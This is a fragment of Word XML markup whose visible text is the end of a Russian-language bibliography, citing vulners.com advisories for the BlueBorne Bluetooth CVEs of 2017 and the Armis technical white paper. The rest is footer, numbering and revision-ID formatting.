          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>-2017-0785.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3966" w:rsidRPr="008A3966" w:rsidRDefault="008A3966" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">-2017-0781. Режим доступа: </w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vulners</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>-2017-07814.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3966" w:rsidRPr="008A3966" w:rsidRDefault="008A3966" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">-2017-0782. Режим доступа: </w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vulners</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>-2017-0782.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3966" w:rsidRPr="008A3966" w:rsidRDefault="008A3966" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">-2017-0783. Режим доступа: </w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vulners</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>-2017-0783.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3966" w:rsidRPr="008A3966" w:rsidRDefault="008A3966" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">-2017-8628. Режим доступа: </w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vulners</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>-2017-8628.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3966" w:rsidRDefault="008A3966" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>-2017-14315. Режим доступа: https://vulners.com/cve/CVE-2017-14315</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880DF7" w:rsidRPr="009F7D7F" w:rsidRDefault="009F7D7F" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009F7D7F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The dangers of Bluetooth implementations: Unveiling zero-day vulnerabilities and security flaws in modern Bluetooth stacks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7D7F">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>доступа:</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7D7F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F7D7F">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>http://go.armis.com/hubfs/BlueBorne%20Technical%20White%20Paper-1.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F7D7F" w:rsidRPr="009F7D7F" w:rsidRDefault="009F7D7F" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="1571" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003802F9" w:rsidRPr="009F7D7F" w:rsidRDefault="003802F9" w:rsidP="003802F9"/>
    <w:p w:rsidR="00F00A9D" w:rsidRPr="009F7D7F" w:rsidRDefault="00F00A9D" w:rsidP="00F00A9D"/>
    <w:p w:rsidR="00F00A9D" w:rsidRPr="009F7D7F" w:rsidRDefault="00F00A9D" w:rsidP="00F00A9D"/>
    <w:sectPr w:rsidR="00F00A9D" w:rsidRPr="009F7D7F" w:rsidSect="001A5A8C">
      <w:footerReference w:type="default" r:id="rId56"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1134" w:right="850" w:bottom="1134" w:left="1701" w:header="708" w:footer="213"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4AB" w:rsidRDefault="000004AB" w:rsidP="00C07525">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000004AB" w:rsidRDefault="000004AB" w:rsidP="00C07525"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="000004AB" w:rsidRDefault="000004AB" w:rsidP="00C07525">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000004AB" w:rsidRDefault="000004AB" w:rsidP="00C075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RobotoMono-Regular">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2989688"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:p w:rsidR="00531A24" w:rsidRDefault="00531A24">
        <w:pPr>
          <w:pStyle w:val="ab"/>
          <w:jc w:val="center"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00731F50">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w:rsidR="00531A24" w:rsidRDefault="00531A24" w:rsidP="00C0752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4AB" w:rsidRDefault="000004AB" w:rsidP="00C07525">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000004AB" w:rsidRDefault="000004AB" w:rsidP="00C07525"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="000004AB" w:rsidRDefault="000004AB" w:rsidP="00C07525">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000004AB" w:rsidRDefault="000004AB" w:rsidP="00C0752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A7F89"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E9667C2E"/>
    <w:lvl w:ilvl="0" w:tplc="04190017">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1)"/>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1F6C319C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CBDC65B2"/>
    <w:lvl w:ilvl="0" w:tplc="B8DED396">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1571" w:hanging="360"/>
      </w:pPr>
      <w:rPr>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222B751A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="727C70D6"/>
    <w:lvl w:ilvl="0" w:tplc="04190017">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2F51741C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4386B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A13DA4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="17A45DD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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="37FD33F2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F59AD1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0111A40"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7B1AF2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25A4269"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="145EBE36"/>
    <w:lvl w:ilvl="0" w:tplc="04190019">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1."/>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47AE26FF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8B84BC1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4B38747F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="079C6C9A"/>
    <w:lvl w:ilvl="0" w:tplc="0419000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>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4B8E3909"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B5C0F9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F0D6035"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="534268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4F4E2DFC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="90DCD29A"/>
    <w:lvl w:ilvl="0" w:tplc="04190017">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1)"/>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611D6D7F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E5B856A0"/>
    <w:lvl w:ilvl="0" w:tplc="04190017">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6CA24D2A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2B8E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656DEB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2604CA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80824"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F9FE1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F95808"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="07C8F7F4"/>
    <w:lvl w:ilvl="0" w:tplc="0419000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7F6B721F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="937C8B2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3"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="1"/>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BD5"/>
    <w:rsid w:val="000004AB"/>
    <w:rsid w:val="00012BBF"/>
    <w:rsid w:val="00012F72"/>
    <w:rsid w:val="00013518"/>
    <w:rsid w:val="00072925"/>
    <w:rsid w:val="0007435A"/>
    <w:rsid w:val="000B71E0"/>
    <w:rsid w:val="000C799E"/>
    <w:rsid w:val="000F60F0"/>
    <w:rsid w:val="0012765C"/>
    <w:rsid w:val="00152F8F"/>
    <w:rsid w:val="001573B7"/>
    <w:rsid w:val="001626DF"/>
    <w:rsid w:val="0016761B"/>
    <w:rsid w:val="001A5A8C"/>
    <w:rsid w:val="001A71B8"/>
    <w:rsid w:val="001F4393"/>
    <w:rsid w:val="00235283"/>
    <w:rsid w:val="00273B72"/>
    <w:rsid w:val="00283EC7"/>
    <w:rsid w:val="002B5C0C"/>
    <w:rsid w:val="002C2D56"/>
    <w:rsid w:val="002F179C"/>
    <w:rsid w:val="002F2E28"/>
    <w:rsid w:val="002F6AFB"/>
    <w:rsid w:val="003077A4"/>
    <w:rsid w:val="003143D6"/>
    <w:rsid w:val="00347C63"/>
    <w:rsid w:val="003802F9"/>
    <w:rsid w:val="00390FED"/>
    <w:rsid w:val="00393F36"/>
    <w:rsid w:val="003A6F8A"/>
    <w:rsid w:val="003B7C46"/>
    <w:rsid w:val="003C1FBB"/>
    <w:rsid w:val="003E4F7A"/>
    <w:rsid w:val="003E7C76"/>
    <w:rsid w:val="003F20AC"/>
    <w:rsid w:val="003F5C29"/>
    <w:rsid w:val="004014A6"/>
    <w:rsid w:val="00401C88"/>
    <w:rsid w:val="00425A9B"/>
    <w:rsid w:val="0044023C"/>
    <w:rsid w:val="00490D1B"/>
    <w:rsid w:val="004B24AA"/>
    <w:rsid w:val="004E239C"/>
    <w:rsid w:val="004F68AA"/>
    <w:rsid w:val="00531A24"/>
    <w:rsid w:val="0058135C"/>
    <w:rsid w:val="005A5947"/>
    <w:rsid w:val="005B5930"/>
    <w:rsid w:val="005C04B7"/>
    <w:rsid w:val="005C07FB"/>
    <w:rsid w:val="005C60CC"/>
    <w:rsid w:val="005C6108"/>
    <w:rsid w:val="005E1C00"/>
    <w:rsid w:val="005F51BA"/>
    <w:rsid w:val="00657E3E"/>
    <w:rsid w:val="006635B6"/>
    <w:rsid w:val="00685E0E"/>
    <w:rsid w:val="006A4FEA"/>
    <w:rsid w:val="00723355"/>
    <w:rsid w:val="00731752"/>
    <w:rsid w:val="00731F50"/>
    <w:rsid w:val="00786AF5"/>
    <w:rsid w:val="007A69B8"/>
    <w:rsid w:val="007B67FD"/>
    <w:rsid w:val="007D7080"/>
    <w:rsid w:val="00806F99"/>
    <w:rsid w:val="00825E5E"/>
    <w:rsid w:val="00880DF7"/>
    <w:rsid w:val="008A3966"/>
    <w:rsid w:val="008B19F4"/>
    <w:rsid w:val="008D3BB1"/>
    <w:rsid w:val="00907FD0"/>
    <w:rsid w:val="009144BE"/>
    <w:rsid w:val="00914F9E"/>
    <w:rsid w:val="009369F2"/>
    <w:rsid w:val="00953F2E"/>
    <w:rsid w:val="0095726D"/>
    <w:rsid w:val="00974EE0"/>
    <w:rsid w:val="009A3D41"/>
    <w:rsid w:val="009F7D7F"/>
    <w:rsid w:val="00A05F4F"/>
    <w:rsid w:val="00A30BD5"/>
    <w:rsid w:val="00A66CA1"/>
    <w:rsid w:val="00A74D30"/>
    <w:rsid w:val="00A924A9"/>
    <w:rsid w:val="00B14741"/>
    <w:rsid w:val="00B27A32"/>
    <w:rsid w:val="00B335BA"/>
    <w:rsid w:val="00B46FF4"/>
    <w:rsid w:val="00B47356"/>
    <w:rsid w:val="00B644F7"/>
    <w:rsid w:val="00B66422"/>
    <w:rsid w:val="00BA0EA2"/>
    <w:rsid w:val="00BD6675"/>
    <w:rsid w:val="00C07525"/>
    <w:rsid w:val="00C14C68"/>
    <w:rsid w:val="00C153B7"/>
    <w:rsid w:val="00C24283"/>
    <w:rsid w:val="00C417A7"/>
    <w:rsid w:val="00C45AEF"/>
    <w:rsid w:val="00CA6DC7"/>
    <w:rsid w:val="00CC0E96"/>
    <w:rsid w:val="00CE5AA2"/>
    <w:rsid w:val="00CE711D"/>
    <w:rsid w:val="00CF3FD7"/>
    <w:rsid w:val="00D16644"/>
    <w:rsid w:val="00D46B37"/>
    <w:rsid w:val="00D66195"/>
    <w:rsid w:val="00D91A39"/>
    <w:rsid w:val="00DA5CB5"/>
    <w:rsid w:val="00DB4694"/>
    <w:rsid w:val="00DC0109"/>
    <w:rsid w:val="00DD05E1"/>
    <w:rsid w:val="00DE7A4D"/>
    <w:rsid w:val="00E5799C"/>
    <w:rsid w:val="00E67626"/>
    <w:rsid w:val="00EA7D8C"/>
    <w:rsid w:val="00EC41E1"/>
    <w:rsid w:val="00ED2006"/>
    <w:rsid w:val="00F0021A"/>
    <w:rsid w:val="00F00A9D"/>
    <w:rsid w:val="00F208C0"/>
